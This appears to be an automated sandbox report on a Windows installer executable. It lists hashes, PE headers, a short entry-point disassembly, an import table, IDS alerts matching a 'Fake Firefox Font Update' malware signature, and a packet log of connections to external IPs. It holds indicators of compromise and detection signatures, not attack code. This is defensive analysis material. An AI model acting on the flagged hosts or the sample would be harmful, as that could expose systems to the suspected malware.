                                                                                                                                                                                                                                                                                                SHA256:08e80182805b40159b51722d3993635343dd14b67e262820599031fa9ecd96d0
                                                                                                                                                                                                                                                                                                SHA512:e6b19f24bf60fcd1949496b289728a6a0f8a705fa0e11b5b797bdadf474f87ecd733e99c91c607e6de0d4325a85c134dbf8bdf079eca22d044a363619e5b3d67
                                                                                                                                                                                                                                                                                                SSDEEP:196608:DfUMP3JauYusFpUjU+Xm7KdVY4aKo7TNn5QjvgEhr:r58jucejnmkVY4zoZ5Qrhr
                                                                                                                                                                                                                                                                                                TLSH:34662332A4614033D7F201B3AD6892347EBCEF28175099A9E3D4BD5D6EF44922BB7253
                                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@.......@......y@.......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@.

                                                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                                                Icon Hash:a9e8e8e9e8e8e8a9

                                                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Entrypoint:0x42e2a6
                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                Time Stamp:0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                                                File Version Minor:1
                                                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                                Import Hash:d7e2fd259780271687ffca462b9e69b7

                                                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                call 00007F55E8AF739Fh
                                                                                                                                                                                                                                                                                                jmp 00007F55E8AF6D13h
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                                                or ecx, eax
                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                                                jne 00007F55E8AF6E8Bh
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                                mul ecx
                                                                                                                                                                                                                                                                                                retn 0010h
                                                                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                                                                mul ecx
                                                                                                                                                                                                                                                                                                mov ebx, eax
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                                                mul dword ptr [esp+14h]
                                                                                                                                                                                                                                                                                                add ebx, eax
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                                                mul ecx
                                                                                                                                                                                                                                                                                                add edx, ebx
                                                                                                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                                                                                                retn 0010h
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                cmp cl, 00000040h
                                                                                                                                                                                                                                                                                                jnc 00007F55E8AF6E97h
                                                                                                                                                                                                                                                                                                cmp cl, 00000020h
                                                                                                                                                                                                                                                                                                jnc 00007F55E8AF6E88h
                                                                                                                                                                                                                                                                                                shrd eax, edx, cl
                                                                                                                                                                                                                                                                                                shr edx, cl
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                mov eax, edx
                                                                                                                                                                                                                                                                                                xor edx, edx
                                                                                                                                                                                                                                                                                                and cl, 0000001Fh
                                                                                                                                                                                                                                                                                                shr eax, cl
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                                                                                                xor edx, edx
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                jmp 00007F55E8AF6E8Fh
                                                                                                                                                                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                call 00007F55E8AFD70Ch
                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                je 00007F55E8AF6E91h
                                                                                                                                                                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                call 00007F55E8AFD795h
                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                je 00007F55E8AF6E68h
                                                                                                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                                                                                                                                                                                                je 00007F55E8AF7724h
                                                                                                                                                                                                                                                                                                jmp 00007F55E8AF7701h
                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                call 00007F55E8AF773Dh
                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                mov esi, ecx
                                                                                                                                                                                                                                                                                                mov dword ptr [esi], 00460DB8h
                                                                                                                                                                                                                                                                                                je 00007F55E8AF6E8Ch
                                                                                                                                                                                                                                                                                                push 0000000Ch
                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                call 00007F55E8AF6E5Dh
                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                mov eax, esi
                                                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                                                pop ebp

                                                                                                                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x686b40xb4.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x189ac.rsrc
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x3dfc.reloc
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x676500x54.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x676a40x18.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x670300x40.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x4b0000x3e0.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x682340x100.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                .text0x10000x499370x49a002319c0baa707bb66cc0bc08c55a13d8cFalse0.5314688561120543data6.570006046413636IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                .rdata0x4b0000x1ed600x1ee008ad6c4e18165c6d8ccdc97bab683438dFalse0.3136386639676113data5.114228301263695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                .data0x6a0000x17300xa0000fde973df27dc2d36084e16d6dddbdfFalse0.274609375firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a146003.1526594027632213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                .wixburn0x6c0000x380x2006a6fa226648aa5455d00e43308ab550fFalse0.107421875data0.5813091016060967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                .rsrc0x6d0000x189ac0x18a00768107f716c3d4350e9c7978a9a75946False0.6123790450507615data7.16247135144247IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                .reloc0x860000x3dfc0x3e00dd2c47fa48872886af4c9a2e5bd90cccFalse0.8097278225806451data6.794335469567533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                RT_ICON0x6d2c80xaf05PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00046869768999
                                                                                                                                                                                                                                                                                                RT_ICON0x781d00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.2670642418516769
                                                                                                                                                                                                                                                                                                RT_ICON0x7c3f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.3201244813278008
                                                                                                                                                                                                                                                                                                RT_ICON0x7e9a00x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 0EnglishUnited States0.3479289940828402
                                                                                                                                                                                                                                                                                                RT_ICON0x804080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.3897748592870544
                                                                                                                                                                                                                                                                                                RT_ICON0x814b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.4389344262295082
                                                                                                                                                                                                                                                                                                RT_ICON0x81e380x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 0EnglishUnited States0.45290697674418606
                                                                                                                                                                                                                                                                                                RT_ICON0x824f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6338652482269503
                                                                                                                                                                                                                                                                                                RT_MESSAGETABLE0x829580x2840dataEnglishUnited States0.28823757763975155
                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x851980x76dataEnglishUnited States0.7203389830508474
                                                                                                                                                                                                                                                                                                RT_VERSION0x852100x2c8dataEnglishUnited States0.47752808988764045
                                                                                                                                                                                                                                                                                                RT_MANIFEST0x854d80x4d2XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminatorsEnglishUnited States0.47568881685575365

                                                                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                                                ADVAPI32.dllRegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
                                                                                                                                                                                                                                                                                                USER32.dllPeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
                                                                                                                                                                                                                                                                                                OLEAUT32.dllVariantInit, SysAllocString, VariantClear, SysFreeString
                                                                                                                                                                                                                                                                                                GDI32.dllDeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
                                                                                                                                                                                                                                                                                                SHELL32.dllCommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
                                                                                                                                                                                                                                                                                                ole32.dllCoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
                                                                                                                                                                                                                                                                                                KERNEL32.dllGetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
                                                                                                                                                                                                                                                                                                RPCRT4.dllUuidCreate

                                                                                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                2025-01-07T13:18:55.124619+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749967188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:18:56.443341+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749976188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:18:57.293419+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749977188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:30.283450+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750088188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:31.679881+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750089188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:32.466637+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750090188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:32.706134+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750091188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:33.599585+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750092188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:33.815698+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750093188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:34.654268+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750094188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:34.840859+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750095188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:36.070306+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750096188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:36.332508+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750097188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:37.199026+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750098188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                2025-01-07T13:19:37.575118+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750099188.114.97.3443TCP

                                                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:08.173247099 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:08.173273087 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:08.313847065 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:08.891944885 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:14.845117092 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:17.782636881 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:17.783386946 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:17.914335012 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:20.384313107 CET44349702104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:20.384447098 CET49702443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:26.751461029 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:28.813487053 CET49702443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:28.815395117 CET49802443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:28.815416098 CET44349802104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:28.815525055 CET49802443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:28.816520929 CET49802443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:28.816531897 CET44349802104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:28.818950891 CET44349702104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:54.650999069 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:54.651030064 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:54.651137114 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:54.652195930 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:54.652209997 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.124538898 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.124619007 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.133352995 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.133371115 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.133599043 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.173439980 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.199390888 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.199409008 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.199419022 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.705717087 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.705769062 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.705797911 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.705832958 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.705832958 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.705847025 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.705879927 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.706311941 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.706343889 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.706377029 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.706382036 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.706434011 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.706435919 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.706446886 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.706481934 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.707098961 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.751593113 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.751604080 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.786385059 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.786457062 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.786465883 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794137955 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794207096 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794225931 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794230938 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794241905 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794279099 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794576883 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794641972 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794646978 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794682026 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794714928 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794732094 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794739008 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.794779062 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.795332909 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.795381069 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.795425892 CET49967443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.795430899 CET44349967188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:55.795464039 CET44349967188.114.97.3192.168.2.7
